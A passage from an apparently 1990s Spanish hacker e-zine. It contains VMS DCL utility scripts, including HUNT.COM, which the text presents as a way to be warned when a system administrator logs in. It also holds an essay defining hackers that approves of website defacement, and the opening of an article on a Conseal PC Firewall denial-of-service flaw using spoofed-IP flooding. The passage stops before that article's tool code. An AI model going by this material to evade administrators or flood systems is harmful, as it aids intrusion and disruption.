  5467.   Subproceso para ejecutar un comando de VMS, si ponemos la opcion /NOWAIT el
  5468.   proceso correra en paralelo con el creador,pero si muere el proceso padre,
  5469.   el proceso acabara su ejecucion, para interrumpir cualquier comando en un
  5470.   VMS se usa CTRL + Y.
  5471.  
  5472.               Tabla de contenidos
  5473.               <<<<<<<<<<<<<<<<<<<
  5474.  
  5475.   1 CD.DOC  Esta es la documentacion del CD.COM.
  5476.   2 CD.COM  utilidad para cambiar de directorio como el CD de PC.
  5477.   3 HUNT.COM Busca un nodo especifico de un usuario, se usa para alertarte de
  5478.     la presencia del Sysop.
  5479.   4 ALARM.COM es una alarma de reloj muy util.
  5480.   5 CGO.COM  Esto te avisa si alguien compila y corre un programa en c.
  5481.  
  5482.     CD.COM Version 5.0 VMS Comando de cambio de directorio
  5483.     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  5484.  
  5485.   Esto es muy parecido al comando CD de MS-DOS:
  5486.  
  5487.   CD - Esto muestra tu directorio home los demas directorios y en nombre del
  5488.        nodo, es similar al comando SHOW de VMS.
  5489.  
  5490.   CD DIRECTORIO - Esto te mueve al directorio elegido.
  5491.  
  5492.   CD SUBDIRECTORIO - Esto te pone en el subdirectorio egejido.
  5493.  
  5494.   CD \ - Este t pondra en tu directorio principal (home).
  5495.  
  5496.   CD HOME - Me mueve al directorio donde tengas tu login.
  5497.  
  5498.   CD SYS$LOGIN - Es como el comando SET DEFAULT SYS$LOGIN en VMS.
  5499.  
  5500.   CD .. - Creo que este ya te lo puedes imaginar.
  5501.  
  5502.   CD . - Resetea al directorio anterior.
  5503.  
  5504.   CD * - Selecciona el subdirectorio a mover de la lista de subdirectorios.
  5505.  
  5506.   CD ? - Te muestra la ayuda del CD-COM.
  5507.  
  5508.         Para navegar por los directorios de un VMS se usa le comando SET
  5509.   DEFAULT. Esto es mas elegante, tu no puedes cambiar a directorios que no
  5510.   existen. Si al pasar a un directorio sale [DIRECTORIO] Directory does not
  5511.   exist! ya te puedes imaginar lo que pasa. y ahora el codigo :)
  5512.  
  5513. ------------ Codigo Fuente ---------------------------------------------------
  5514.  
  5515. $! CD.COM v6.09
  5516. $! The Ultimate Change Directory Command.
  5517. $!
  5518. $  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
  5519. $  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
  5520. $  odir     = f$environment("DEFAULT")              ! Old  Directory
  5521. $  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
  5522. $!
  5523. $  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
  5524. $  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
  5525. $  if (ndir .eqs. "?")          then goto HELP      ! Instructions
  5526. $!
  5527. $  PARSE:
  5528. $  length   = f$length(ndir)                        ! Fix up ndir
  5529. $  if (f$location("@",ndir) .eq. 0) .or. -
  5530.       (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
  5531. $  right    = f$location("]",ndir) + 1
  5532. $  if (right .gt. length) then right = f$location(">", ndir)
  5533. $  if (right .le. length) then ndir  = f$extract(0, right, ndir)
  5534. $!
  5535. $  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
  5536. $     ndir   = f$trnlnm(ndir)                       ! Logical Name
  5537. $     goto PARSE
  5538. $!
  5539. $  CASESYM:
  5540. $  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
  5541. $     ndir = 'ndir'                                 ! Symbol
  5542. $     goto PARSE
  5543. $!
  5544. $  CASE0:
  5545. $  len_ndir = f$length(ndir)                        ! Regular Dir
  5546. $  if (f$location("[", ndir) .lt. len_ndir) .or. -
  5547.       (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
  5548. $!
  5549. $  CASE1:                                           ! Home Dir
  5550. $  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
  5551. $     ndir = hdir
  5552. $     goto SETDIR
  5553. $!
  5554. $  CASE2:                                           ! . .. .dir
  5555. $  if (f$location(".", ndir) .nes. 0) then goto CASE3
  5556. $     if (ndir .eqs. "..") then ndir = "-"
  5557. $     if (f$extract(0, 2, ndir) .eqs. "..") -
  5558.          then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
  5559. $     ndir = "[" + ndir + "]"
  5560. $     if (ndir .eqs. "[.]") then ndir = odir
  5561. $     goto SETDIR
  5562. $!
  5563. $  CASE3:                                           ! :
  5564. $  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
  5565. $     left    = f$location(":", ndir) + 1
  5566. $     symbol  = f$extract(left, 1, ndir)
  5567. $     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
  5568. $     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
  5569. $        ndir = f$extract(0, left, ndir) + "[" -
  5570.               + f$extract(left, len_ndir - left+1, ndir) + "]"
  5571. $     goto SETDIR
  5572. $!
  5573. $  CASE3B:                                          ! NODE::nothing
  5574. $  if (f$length(ndir)-1 .gt. left) then goto CASE3C
  5575. $     ndir = ndir + "[000000]"
  5576. $     goto SETDIR
  5577. $!
  5578. $  CASE3C:                                          ! NODE::directory
  5579. $  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
  5580.       then goto SETDIR
  5581. $
  5582. $     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
  5583. $     goto SETDIR
  5584. $!
  5585. $  CASE4:                                           ! dir
  5586. $  ndir = "[" + ndir + "]"
  5587. $!
  5588. $  SETDIR:
  5589. $  set default 'ndir'
  5590. $  if (f$parse("") .eqs. "") then goto DIRERROR
  5591. $!
  5592. $  DISPLAY:
  5593. $  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
  5594. $     hnode = f$getsyi("NODENAME")
  5595. $     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
  5596. $     if (cnode .eqs. "") then cnode = hnode
  5597. $     cdir  = f$environment("DEFAULT")
  5598. $     write sys$output " "
  5599. $     write sys$output "          Home Node: ", hnode
  5600. $     write sys$output "     Home Directory: ", hdir
  5601. $     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
  5602. $     write sys$output "       Current Node: ", cnode
  5603. $     write sys$output "  Current Directory: ", cdir
  5604. $  DISPSKIP:
  5605. $     write sys$output " "
  5606. $!
  5607. $  NODISPLAY:
  5608. $  ndir = f$environment("DEFAULT")
  5609. $  if .not. prompton then goto END
  5610. $!
  5611. $  if (f$length(ndir) .ge. 32) then goto TOOLONG
  5612. $!
  5613. $  SETPROMPT:
  5614. $  set prompt = 'ndir'" "
  5615. $!
  5616. $  END:
  5617. $  exit
  5618. $!
  5619. $  DIRERROR:
  5620. $  write sys$output " "
  5621. $  write sys$output "          ", ndir, " Directory does not exist!"
  5622. $  write sys$output " "
  5623. $  set default 'odir'
  5624. $  ndir = odir
  5625. $  goto NODISPLAY
  5626. $!
  5627. $! Prompt Problems------------------------------------------------------------
  5628. $!
  5629. $  TOOLONG:
  5630. $! Prompt is too long. Get rid of everything to the left of [ or <. If that
  5631. $! doesn't work, get rid of a subdirectory at a time.  As a last resort,
  5632. $! set the prompt back to $.
  5633. $!
  5634. $  left     = f$location("[", ndir)
  5635. $  len_ndir = f$length(ndir)
  5636. $  if (left .ge. len_ndir) then left = f$location("<",ndir)
  5637. $  if (left .gt. 0) .and. (left .lt. len_ndir) -
  5638.       then ndir = f$extract(left, len_ndir - left, ndir)
  5639. $!
  5640. $  STILLTOOLONG:
  5641. $    if (f$length(ndir) .lt. 32) then goto SETPROMPT
  5642. $    left     = f$location(".", ndir) + 1
  5643. $    len_ndir = f$length(ndir)
  5644. $    if left .ge. len_ndir then ndir = "$ "
  5645. $    if left .ne. len_ndir -
  5646.         then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
  5647. $    goto STILLTOOLONG
  5648. $!
  5649. $! Wildcard Directory---------------------------------------------------------
  5650. $!
  5651. $  DIRSEARCH:
  5652. $  error_message = f$environment("MESSAGE")
  5653. $  on control_y then goto DIREND
  5654. $  on control_c then goto DIREND
  5655. $  set message/nosev/nofac/noid/notext
  5656. $  write sys$output " "
  5657. $  dispct = 1
  5658. $  dirct  = 0
  5659. $  pauseflag = 1
  5660. $!
  5661. $  DIRLOOP:
  5662. $    userfile = f$search("*.dir")
  5663. $    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
  5664. $    if (userfile .eqs. "") then goto DIRNONE
  5665. $    dispct = dispct + 1
  5666. $    dirct  = dirct  + 1
  5667. $    on severe then $ userprot = "No Priv"
  5668. $    userprot = f$file_attributes(userfile,"PRO")
  5669. $    if userprot .nes. "No Priv" then userprot = " "
  5670. $    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
  5671. $    userprot'dirct' = userprot
  5672. $    lengthflag = (f$length(userfile'dirct') .gt. 18)
  5673. $    if lengthflag then write sys$output -
  5674.         f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
  5675. $    if (.not. lengthflag) then write sys$output -
  5676.         f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
  5677. $    if (dispct .lt. 8) then goto DIRLOOP
  5678. $    dirct  = dirct  + 1
  5679. $    userfile'dirct' = ""
  5680. $    dirct  = dirct  + 1
  5681. $    userfile'dirct' = ""
  5682. $    if pauseflag then goto DIRMENU
  5683. $    dispct = 0
  5684. $    goto DIRLOOP
  5685. $!
  5686. $  DIRMENU:
  5687. $  write sys$output " "
  5688. $  if (userfile .eqs. "") then goto DIRMENU2
  5689. $     write sys$output "    M   More subdirectories"
  5690. $  if pauseflag then -
  5691. $     write sys$output "    N   More subdirectories/No pause"
  5692. $!
  5693. $  DIRMENU2:
  5694. $     write sys$output "    R   Re-Display subdirectories"
  5695. $     write sys$output "    Q   Quit (default)"
  5696. $
  5697. $  DIRINQUIRE:
  5698. $  write sys$output " "
  5699. $  inquire dirchoice "  Select One"
  5700. $  write sys$output " "
  5701. $!
  5702. $  if (dirchoice .gt. 0)    .and. -
  5703.       (dirchoice .le. dirct) then goto DIRCASEDIGIT
  5704. $  dirchoice = f$edit(dirchoice,"UPCASE")
  5705. $  if (dirchoice .eqs. "")  .or. -
  5706.       (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
  5707. $  if (dirchoice .eqs. "M") .or. -
  5708.       (dirchoice .eqs. "N")  then goto DIRCASEMORE
  5709. $  if (dirchoice .eqs. "R")  then goto DIRCASERED
  5710. $!
  5711. $  DIRCASERROR:
  5712. $  if (dirct .eq. 1)   then write sys$output -
  5713.       "  Select 1 to change to the ", userfile1, " subdirectory. "
  5714. $  revdirct = dirct
  5715. $  if (dispct .eq. 8) then revdirct = revdirct - 2
  5716. $  if (dirct .gt. 1)   then write sys$output -
  5717.       "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
  5718. $  goto DIRINQUIRE
  5719. $!
  5720. $  DIRCASEDIGIT:
  5721. $  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
  5722. $  ndir = userfile'dirchoice'
  5723. $  goto DIREND
  5724. $!
  5725. $  DIRCASEBLANK:
  5726. $  write sys$output "  Subdirectory not changed."
  5727. $  write sys$output " "
  5728. $  goto DIREND
  5729. $!
  5730. $  DIRCASEMORE:
  5731. $  dispct = 0
  5732. $  if (dirchoice .eqs. "N") then pauseflag = 0
  5733. $  if (userfile .nes. "")   then goto DIRLOOP
  5734. $  write sys$output "  No more subdirectories to display."
  5735. $  goto DIRINQUIRE
  5736. $!
  5737. $  DIRCASERED:
  5738. $  dispct = 1
  5739. $  DISPLOOP:
  5740. $     if (userfile'dispct' .eqs "") then goto DISPDONT
  5741. $     lengthflag = (f$length(userfile'dispct') .gt. 18)
  5742. $     if lengthflag then write sys$output -
  5743.          f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
  5744. $     if (.not. lengthflag) then write sys$output -
  5745.          f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
  5746. $     DISPDONT:
  5747. $     dispct = dispct + 1
  5748. $     if (dispct .le. dirct) then goto DISPLOOP
  5749. $  goto DIRMENU
  5750. $!
  5751. $  DIRNONE:
  5752. $  write sys$output "No subdirectories to choose, or no directory privileges."
  5753. $  write sys$output " "
  5754. $  goto DIREND
  5755. $!
  5756. $  DIREND:
  5757. $  set message 'error_message'
  5758. $  on control_y then exit
  5759. $  on control_c then exit
  5760. $  if (ndir .eqs. "*") then goto DISPLAY
  5761. $  goto PARSE
  5762. $!
  5763. $!-Help-----------------------------------------------------------------------
  5764. $!
  5765. $  HELP:
  5766. $  type sys$input
  5767.  
  5768.                CD.COM  Version 6  VMS Change Directory Command
  5769.  
  5770.                          Usage:  CD command/directory
  5771.  
  5772. CD         Display home directory,       CD ..       Change directory to the
  5773.            current directory, node.      CD [-]      dir above current dir.
  5774.  
  5775. CD \       Change directory to your      CD ..sub    Change directory to a
  5776. CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.
  5777.  
  5778. CD dir     Change directory to the       CD *        Display/select the
  5779. CD [dir]   [dir] directory.                          available subdirectories.
  5780.  
  5781. CD .sub    Change directory to the       CD .        Reset current directory.
  5782. CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.
  5783.  
  5784.      CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
  5785.      To make CD available from                To have the VMS $ prompt
  5786.      any directory you change to.             display the current directory.
  5787.  
  5788.                               By The Mentor
  5789. $  goto END
  5790.  
  5791. ------------ FIN -------------------------------------------------------------
  5792.  
  5793.   CODIGO DEL HUNT.COM
  5794.   <<<<<<<<<<<<<<<<<<<
  5795.  
  5796. ------------ Codigo Fuente ---------------------------------------------------
  5797.  
  5798. $ ! HUNT.COM
  5799. $ ! By The Mentor
  5800. $ ! Updated by: The Mad Mexican
  5801. $ ! Usage: SPAWN/NOWAIT @HUNT
  5802. $ !
  5803. $ !Searches SHOW USER output for a specified user,  strobes at given
  5804. $ !intervals considering the severity of the hunt at which time output
  5805. $ !is generated and process terminates. If user loggs in then output
  5806. $ !is generated and process terminates. May check both nodes if a set
  5807. $ !host is called.  Also supports a file with the names to be hunted for.
  5808. $ !
  5809. $ !  *** NOTE ***   This is set up for a two-node system with NYSSA
  5810. $ !                 being the default node and TEGAN being the alternate
  5811. $ !                 node (Circuit Breaker and some others will recognize
  5812. $ !                 the nodes as my 'home' ones.)  You will need to
  5813. $ !                 slightly modify the code to reflect the nodename(s)
  5814. $ !                 of whatever system you are using...
  5815. $ !
  5816. $ !
  5817. $ !
  5818. $ say="write sys$output"
  5819. $ on control then goto door
  5820. $ monitored_node = "''NODE'"
  5821. $ say "Monitoring node ''monitored_node'.  "
  5822. $ severity_of_hunt:
  5823. $ inquire selection "Severity of HUNT, 1 being the most urgent: 1-2-3"
  5824. $ if selection.ge.2 then goto selection_2
  5825. $ delay="wait 00:00:20"
  5826. $ loop_count=40
  5827. $ goto begin_process
  5828. $ selection_2:
  5829. $ if selection.eq.3 then goto selection_3
  5830. $ delay="wait 00:01:00"
  5831. $ loop_count=8
  5832. $ goto begin_process
  5833. $ if selection.gt.3 then goto severity_of_hunt
  5834. $ delay="wait 00:02:30"
  5835. $ loop_count=20
  5836. $ begin_process:
  5837. $ if monitored_node.eqs."TEGAN" then goto search_file_tegan
  5838. $ if f$search("nyssa.dat9") .nes. "" then goto file_exist
  5839. $ goto continue
  5840. $ search_file_tegan:
  5841. $ if f$search("tegan.dat9") .nes. "" then goto file_exist
  5842. $ continue:
  5843. $ say "hit "
  5844. $ inquire/nopunctuate choice9 "Who are we hunting for? "
  5845. $ if choice9 .eqs. "" then exit
  5846. $ count = 0
  5847. $ bell_sound[0,8]=%X07
  5848. $ top:
  5849. $ sho user/output='monitored_node'.dat9
  5850. $ purge 'monitored_node'.dat9
  5851. $ set message/nofac/noid/notext/nosev
  5852. $ search 'monitored_node'.dat9 'choice9'
  5853. $ a=$severity
  5854. $ if a .eqs. "1" then goto found_user
  5855. $ set message 'temp_msg9'
  5856. $ count = count + 1
  5857. $ if count .ge. 'loop_count' then goto give_up
  5858. $ delay
  5859. $ goto top
  5860. $ file_exist:
  5861. $ say "ERROR - Could not create temporary data file."
  5862. $ say "Please delete or rename ''NODE'.DAT9"
  5863. $ exit
  5864. $ found_user:
  5865. $ say bell_sound
  5866. $ say "''choice9' is now online on node ''monitored_node'."
  5867. $ say bell_sound
  5868. $ goto door
  5869. $ give_up:
  5870. $ say " "
  5871. $ say "''choice9' has not yet logged in on ''monitored_node'."
  5872. $ door:
  5873. $ say bell_sound
  5874. $ say "HUNT routine has terminated on node ''monitored_node'."
  5875. $ delete/noconfirm/nolog 'monitored_node'.dat9;*
  5876. $ set message 'temp_msg9'
  5877. $ exit
  5878.  
  5879. ------------ FIN -------------------------------------------------------------
  5880.  
  5881.   CODIGO DEL ALARM.COM
  5882.   <<<<<<<<<<<<<<<<<<<<
  5883.  
  5884. ------------ Codigo Fuente ---------------------------------------------------
  5885.  
  5886. $ ! ALARM.COM
  5887. $ ! By The Mentor
  5888. $ ! Usage: SPAWN/NOWAIT @ALARM
  5889. $ ! Strobes f$time() every 5 seconds until specified time
  5890. $ ! is met at which time output is generated and process terminates.
  5891. $ CLR = " "
  5892. $ count = 0
  5893. $ PID           = F$PID(CONTEXT)
  5894. $ TERMINAL      = F$GETJPI(''PID',"TERMINAL")
  5895. $ DEVICE        = F$GETDVI(TERMINAL,"DEVTYPE")
  5896. $ IF DEVICE .EQS. 110 THEN CLR = "[H[2J"  ! VT220
  5897. $ IF DEVICE .EQS.  98 THEN CLR = "[H[2J"  ! VT102
  5898. $ IF DEVICE .EQS.  96 THEN CLR = "[H[2J"  ! VT100
  5899. $ IF DEVICE .EQS.  64 THEN CLR = "HJ"     ! VT52
  5900. $ CLS = "WRITE SYS$OUTPUT CLR"
  5901. $ DATE       = F$CVTIME(F$TIME())
  5902. $ NODE       = F$GETSYI("NODENAME")
  5903. $ bell[0,8]=%X07
  5904. $ ON CONTROL THEN GOTO DOOR
  5905. $ say = "write sys$output"
  5906. $ say f$cvtime(,,"TIME")
  5907. $ say " "
  5908. $ say "Hit (RETURN)"
  5909. $ say " "
  5910. $ inquire/nopunctuate alarm "What time shall I ring you - "
  5911. $ a_hour = f$element(0,":",alarm)
  5912. $ a_minute = f$element(1,":",alarm)
  5913. $ a_second = f$element(2,":",alarm)
  5914. $ time_check:
  5915. $ hour = f$element(0,":",f$cvtime(,,"TIME"))
  5916. $ minute = f$element(1,":",f$cvtime(,,"TIME"))
  5917. $ second = f$element(2,":",f$element(0,".",f$cvtime(,,"TIME")))
  5918. $ if hour .ge. a_hour .and. minute .ge. a_minute .and. second .ge.
  5919.   a_second then goto top
  5920. $ if hour .ge. a_hour .and. minute .ge. a_minute then goto top
  5921. $ wait 00:00:05
  5922. $ goto time_check
  5923. $ top:
  5924. $ count = count + 1
  5925. $ cls
  5926. $ say " "
  5927. $ say " "
  5928. $ say " "
  5929. $ say " "
  5930. $ say " "
  5931. $ say " "
  5932. $ say " "
  5933. $ say " "
  5934. $ say " "
  5935. $ say " "
  5936. $ say " "
  5937. $ say "                              A L A R M   O N"
  5938. $ say bell
  5939. $ say "                                 ",f$element(0,".",f$cvtime(,,"TIME"))
  5940. $ say " "
  5941. $ say " "
  5942. $ say " "
  5943. $ say " "
  5944. $ say " "
  5945. $ say " "
  5946. $ say " "
  5947. $ say " "
  5948. $ say " "
  5949. $ wait 00:00:01.50
  5950. $ if count .le. "6" then goto top
  5951. $ door:
  5952. $ say "ALARM OFF"
  5953. $ say f$element(0,".",f$cvtime(,,"TIME"))
  5954. $ say bell
  5955. $ exit
  5956.  
  5957. ------------ FIN -------------------------------------------------------------
  5958.  
  5959.   CODIGO DEL CGO.COM
  5960.   <<<<<<<<<<<<<<<<<<
  5961.  
  5962. ------------ Codigo Fuente ---------------------------------------------------
  5963.  
  5964. $! CGO.COM
  5965. $! By The Mentor
  5966. $! One-Line compile/link/execute of C programs
  5967. $! Usage: CGO :== @CGO.COM
  5968. $!        CGO filename
  5969. $!
  5970. $if p1 .nes. "" then c_filename :== 'p1
  5971. $ write sys$output "Compiling:"
  5972. $ cc 'c_filename/list='c_filename.lst
  5973. $ write sys$output "Linking:"
  5974. $ link 'c_filename ,options_file/opt
  5975. $ write sys$output "Running:"
  5976. $ assign/user sys$command sys$input
  5977. $ run 'c_filename
  5978. $ exit
  5979.  
  5980. ------------ FIN -------------------------------------------------------------
  5981.  
  5982.         Bien, intentare traducir y adaptar otros textos de la Phrack que me
  5983.   interesen y distribuirlos a los proyectos de Raregazz y Underhack, este
  5984.   texto ha sido corregido y adaptado para poder ser entendidos por gente de
  5985.   todos los niveles pero si te interesa ver el original puedes verlo en la
  5986.   phrack19 es el 2#
  5987.  
  5988.         Saludos a los canales del irc Hispano #hack #hackers #hack_novatos y
  5989.   a todos los grupos H/P/C/V españoles.
  5990.                                         -E-
  5991.  
  5992. <────────────────────────────────────────────────────────────────────────────>
  5993. ██████████████████████████████████████████████████████████████████████████████
  5994. <────────────────────────────────────────────────────────────────────────────>
  5995.  
  5996.                           #############################
  5997.                           #                           #
  5998.                           #     Que es un hacker      #
  5999.                           #                           #  
  6000.                           #      By: Tasslehoff       #
  6001.                           #                           #
  6002.                           # - J.J.F. / Hackers Team - #
  6003.                           #                           #
  6004.                           #############################
  6005.  
  6006.         Tras la anaquia, que podemos pensar que es Internet, podemos encontrar
  6007.   un mundo complejo y completo, con sus culturas y sociedades. Este mundo,
  6008.   supuestamente anarquico, acoge diversos grupos que se relacionan y
  6009.   desarrollan ahi; los cuales podemos clasificar de muy diversas formas; una
  6010.   es su situacion respecto a la ley, la ley del mundo no-electronico, otra es
  6011.   con arreglo a sus conocimientos ; otra importante clasificacion seria su
  6012.   etica, refieriendose con ello a su actitud con otros "ciuadanos" de la red y
  6013.   con los conocimientos que en ella, la red, uno puede encontrar.
  6014.  
  6015.         Podriamos decir que la comunidad de Internet se divide en cuatro
  6016.   grupos principales: 1- Usuarios normales, 2- Empresas, 3- Organizaciones
  6017.   gubernamentales y 4- Mundo Underground.
  6018.  
  6019.         El "mundo" Underground sera el lugar donde encontraremos a los
  6020.   infalibles "Hackers". Pero... ¿ Que es el mundo Underground ? Bueno,
  6021.   empezemos por definir que es Underground. El termino Underground biene
  6022.   definido o dado de los paises de habla Anglo-Sajona (Ingleses y Americanos)
  6023.   y se refiere a grupos de cultura minoritaria, que se desarrollan bajo la
  6024.   cultura general y que tienen unas determinadas creencias y filosofias
  6025.   bastante heterodoxas si los comparamos con la "mayoria cultural". Esta
  6026.   definicion es facilmnte aplicable a Internet donde encontraremos facilmente
  6027.   diversos grupos interesados en aspectos culturales, que normalmente
  6028.   considerariamos minoritarios. Es aqui, en el "mundo Underground" donde
  6029.   encontraremos grupos especialmente interesados en aspectos relacionados con
  6030.   la "seguridad informatica", ya sea en su "creacion" como en su "violacion".
  6031.   Este grupo de usuarios podemos lo podemos dividir en tres ramas: Wanabes,
  6032.   Crackers y Hackers. Llegando a este punto donde sabemos donde encontrar a
  6033.   los "Hackers" y sabien en que contexto se mueven, empecemos con la
  6034.   aproximacion a este grupo y de las diferentes definiciones que de el se
  6035.   hacen.
  6036.  
  6037.         Ciertos grupos empresariales , organicaciones gubernamentales, cuerpos
  6038.   de seguridad y colectivos en cierta forma retrogrados suelen definir
  6039.   "hacker" como esos "malas" personas que se dedican a burlar sistemas de
  6040.   seguridad, la copia y el robo asi como la destruccion de datos mas o menos
  6041.   valiosos almacenados en un ordenador, y a los cuales, los hackers, no tienen
  6042.   acceso legal. Los hackers son seres a los que hay que eliminar asi como a
  6043.   su perniciosa filosofia que poseen y que pone en peligro a todos los
  6044.   habitantes de la red y a sus datos, con sus maniobras y juegos causando
  6045.   "miles" de millones de perdidas con sus salvajes ataques. Bueno, es una
  6046.   definicion "curiosa", o decir algo, a tener en cuenta como a cualquier
  6047.   otra, ante todo en Internet hay libertad de expresion, aunque ellos, estos
  6048.   grupos decadentes y de concepciones de cierta manera arcaicas, cometen un
  6049.   error de definicion, para asi, defender sus intereses, no claramente
  6050.   identificables, y etica que nos intenta implantar.
  6051.  
  6052.         Por otro lado estan aquellos que navegando por la red encuentran
  6053.   ciertos articulos, comentarios, rumores... y devido a su inexperiencia o a
  6054.   que nadie les ha dado una definicion mejor consideran a los hackers como
  6055.   "Esos magos de las fuerzas de Internet" que "desafian a los poderosos". Los
  6056.   Hackers son "cojonudos" o "la ostia", son "tios guais" (de mayor quiero ser
  6057.   como ellos :) ), que se mueven como pez en el agua en Internet y el resto
  6058.   de las redes. Es una "bonita" definicion pero creo que "ligeramente" ;)
  6059.   incorrecta.
  6060.  
  6061.         La tercera definicion fue desarrollada hace tiempo, definiendo como
  6062.   hacker como a un programador com amplios conocimentos de seguridad
  6063.   informatica que puede descubrir bugs (agujeros) en el sistema de seguridad,
  6064.   sabiendo como aprobecharlos para entrar dentro del sistema gracias a esos
  6065.   fallos anteriormente descritos. Esta definion fue primeramente utilizada por
  6066.   los primeros "hackers" que salieron del M.I.T. (Massachuset Institute of
  6067.   Technology). 
  6068.  
  6069.         Finalmente llegamos a lo que considero una definicion mas acertada,
  6070.   que no por ser mia es la mas correcta ni valida, pero que espero que de
  6071.   alguna manera resulte util y aclare aunque sea un poco este enrredo creado
  6072.   alrededor de los "Hackers" a los cuales o bien se les vilipendia o bien se
  6073.   les "ensalza" mas alla de cualquer limite logico hasta niveles de semidioses
  6074.   electronicos, lo cual no es correcto, a fin de cuentas, somo humanos, aunque
  6075.   a veces un poquito raros cuando nos colocan una pantalla y un teclado
  6076.   delante, pero bueno, vamos al asunto. Los "hackers" son en cierta forma
  6077.   programadores , guerreros y filosofos ¡ Menuda definicion verdad !, esperad
  6078.   que os lo aclare y no penseis que estoy ms loco de lo que realmente
  6079.   estoy ;).
  6080.  
  6081.         Los Hackers son programadores, Son programadores devido a que saben
  6082.   programar, sin unos conocimientos de programacion, S.O. y redes seria muy
  6083.   dificil que realizaran su labor como hackers, si no imposible. Si, ya se que
  6084.   en internet podemos encontrar programillas que realizan las labores mas
  6085.   tendiosas en lugar de realizarlas nosotros pero con dichos programas, no
  6086.   podemos sacar ni una pequeña parte del potencial que tenemos con unos
  6087.   conocimientos sobre UNIX, redes, S.O. en general, C, perl. Asi es importante
  6088.   saber. El saber, el conocimiento es el poder del hacker.
  6089.  
  6090.         Por otro lado podemos considerar a los hackers como guerreros. que
  6091.   luchan por defender la libertad de Internet. Una libertad que tanto Estados
  6092.   como grandes compañias intentan suprimir. Para ello, los hacker luchan de
  6093.   muy diversas formas: publicando articulos, e-zines, paginas web,
  6094.   informacion valiosa que nos permite ampliar los conocimientos y mantener la
  6095.   libertad. Tambien hay formas de "lucha" mas activas como la inutilizacion o
  6096.   hackeo de paginas web denigrantes, como las de pornografia infantil.
  6097.  
  6098.         Por ultimo, y en cierta forma abstracta se puede considerar a los
  6099.   hackers (o algunos hackers) como filosofos, con sus ideas de libertad cuasi
  6100.   absoluta en la red, una filosofia que desarrollan y defienden, poniendo esa
  6101.   libertad por encima de intereses economicos o individuales, siendo a veces
  6102.   perseguidos e insultados por los poderosos.
  6103.  
  6104.         Se deve recalcar tambien que todo lo que hacen los hackers, segun la
  6105.   filosofia en que se amparan, no es destructivo ni una busqueda de beneficios
  6106.   personales, los miembros del mundo underground que buscan esto ultimo se
  6107.   suelen definir como crackers y si bien algunos de estos tienen conocimientos
  6108.   que les podrian equiparar con los hackers, aunque la mayoria no los tengan,
  6109.   es la filosofia hacker lo que les diferencia a unos de otros.
  6110.  
  6111.         Pues nada, ahi teneis una definicion, espero que os guste y os
  6112.   parezca correcta si no, la borrais de vuestro disco y fuera. ;) ¡Espero que
  6113.   no!
  6114.                         From:       Tasslehoff
  6115.                               - J.J.F. / Hackers Team -
  6116.                                 tasslehoff@jjf.org
  6117.  
  6118. <────────────────────────────────────────────────────────────────────────────>
  6119. ██████████████████████████████████████████████████████████████████████████████
  6120. <────────────────────────────────────────────────────────────────────────────>
  6121.  
  6122.                            Conseal PC Firewall Bug
  6123.                            -----------------------
  6124.  
  6125.                                   By Bisho
  6126.  
  6127.   1.- Conseal PC Firewall 1.2 y anteriores Bug
  6128.   2.- Proteccion
  6129.   3.- Herramientas
  6130.       3.1.-Como funciona el programa
  6131.       3.2.-conseal.c
  6132.  
  6133.         En este articulo voy a tratar un tema que me parece bastante
  6134.   interesante. Es un bug del Conseal PC Firewall. Se ha descubierto que tiene
  6135.   un fallo de DoS (denial os service) y muy facil de explotar. Bien vamos a
  6136.   ello :o).
  6137.  
  6138.   1.- Conseal PC Firewall 1.2 y anteriores Bug
  6139.   --------------------------------------------
  6140.  
  6141.         Es un ataque bastante facil de DoS (denial of service). Solo funciona
  6142.   en las versiones anteriores a la de junio del 98 (ya que fue cuando se les
  6143.   notifico el fallo a los de Signal9 y arreglaron el bug en una semanita mas
  6144.   o menos), la cual es la version 1.2 o anterior. Pero en muchos sitios warez
  6145.   todavia tienen esta version, lo que hace que este ataque todavia funcione.
  6146.  
  6147.         La verdad es que este tipo no tiene nada de especial, un floodeo, pero
  6148.   cambiando las IP's se consigue que se cuelgue el ordenador incluso si se
  6149.   han cambiado los puertos. Esto causa que conseal se coma TODOS los recursos
  6150.   disponibles del ordenador y como resultanto un reseteo del mismo :o) si el
  6151.   ataque continua durante 10 a 30 segundos despues de colgarlo.
  6152.  
  6153.   2.- Proteccion
  6154.   --------------
  6155.  
  6156.         La verdad es que es bastante simple, solo tienes que quitar el modo
